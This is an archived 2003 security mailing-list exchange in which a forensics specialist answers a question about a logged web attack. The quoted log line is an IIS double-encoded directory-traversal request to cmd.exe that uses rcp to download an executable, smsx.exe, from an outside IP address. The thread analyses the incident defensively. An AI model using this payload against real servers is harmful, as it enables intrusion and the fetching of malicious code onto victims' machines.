No, adm is the user, at least according to the rcp usage instructions.
H:\>rcp
Copies files to and from computer running the RCP service.
RCP [-a | -b] [-h] [-r] [host][.user:]source [host][.user:] path\destination
-a Specifies ASCII transfer mode. This mode converts
the EOL characters to a carriage return for UNIX
and a carriage
return/line feed for personal computers. This is
the default transfer mode.
-b Specifies binary image transfer mode.
-h Transfers hidden files.
-r Copies the contents of all subdirectories;
destination must be a directory.
host Specifies the local or remote host. If host is
specified as an IP address OR if host name contains
dots, you must specify the user.
.user: Specifies a user name to use, rather than the
current user name.
source Specifes the files to copy.
path\destination Specifies the path relative to the logon directory
on the remote host. Use the escape characters
(\ , ", or ') in remote paths to use wildcard
characters on the remote host.
"rcp -b 195.92.252.138.adm:smsx.exe ."
RCP smsx.exe from 195.92.252.138 to . (here) as user adm.
Your windows guy should have tried typing the command with no arguments...
;-P
Cory Altheide
Computer Forensics Specialist
NCI Information Systems, Inc.
NNSA Cyber Forensics Center
altheidecat_private
> -----Original Message-----
> From: Steve Bromwich [mailto:incidentat_private]
> Sent: Monday, May 05, 2003 10:30 AM
> To: incidentsat_private
> Subject: smsx.exe?
>
>
> Hi,
>
> Has anyone seen a request like this in their logs?
>
> 205.247.193.56 - - [05/May/2003:11:59:52 -0300]
> "/scripts/..%255c..%255cwinnt/system32/cmd.exe?/c+rcp+-b+195.9
2.252.138.adm:smsx.exe+."
>
> I tried rcping smsx.exe off the remote site but no joy; is
> the .adm an obscure windows-specific port address or
> something? One of our windows guys said the smsx was "remote
> management software", but had no idea about the .adm...
>
> On a side note, the response I got from energis (the
> 195.92.252.138 owner) had the following at the start:
>
> PLEASE NOTE WE ARE CURRENTLY DEALING WITH A 2 WEEK BACKLOG
>
> Further down:
>
> Please note that if one of our IP addresses looks up to a
> 'webcache' (as opposed to a modem) we have a *maximum* of 30
> hours to trace the user responsible for the abuse.
>
> So I guess this means that Energis users have a pretty good
> chance of abusing remote servers through Energis' web cache
> and getting away with it :-/
>
> Cheers, Steve
>
> --------------------------------------------------------------
> --------------
> Attend Black Hat Briefings & Training Europe, May 12-15 in
> Amsterdam, the
> world's premier event for IT and network security experts.
> The two-day
> Training features 6 hand-on courses on May 12-13 taught by
> professionals.
> The two-day Briefings on May 14-15 features 24 top speakers
> with no vendor
> sales pitches. Deadline for the best rates is April 25.
> Register today to
> ensure your place. http://www.securityfocus.com/BlackHat-incidents
> --------------------------------------------------------------
> --------------
>
>
----------------------------------------------------------------------------
Attend Black Hat Briefings & Training Europe, May 12-15 in Amsterdam, the
world's premier event for IT and network security experts. The two-day
Training features 6 hand-on courses on May 12-13 taught by professionals.
The two-day Briefings on May 14-15 features 24 top speakers with no vendor
sales pitches. Deadline for the best rates is April 25. Register today to
ensure your place. http://www.securityfocus.com/BlackHat-incidents
----------------------------------------------------------------------------
This archive was generated by hypermail 2b30 : Mon May 05 2003 - 17:34:39 PDT